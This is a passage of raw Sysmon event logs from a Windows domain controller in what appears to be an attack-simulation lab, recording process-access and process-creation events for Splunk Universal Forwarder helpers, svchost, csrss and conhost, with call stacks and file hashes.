51791 10341000x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42A2-6000-7900-000000009A01}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:55.071{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A2-6000-7900-000000009A01}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.905{08A6967A-42A2-6000-7900-000000009A01}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.743{08A6967A-42A4-6000-7B00-000000009A01}2748856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A4-6000-7B00-000000009A01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-42A4-6000-7B00-000000009A01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A4-6000-7B00-000000009A01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.587{08A6967A-42A4-6000-7B00-000000009A01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:56.071{08A6967A-42A3-6000-7A00-000000009A01}39083808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.602{08A6967A-42A5-6000-7C00-000000009A01}33562564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A5-6000-7C00-000000009A01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 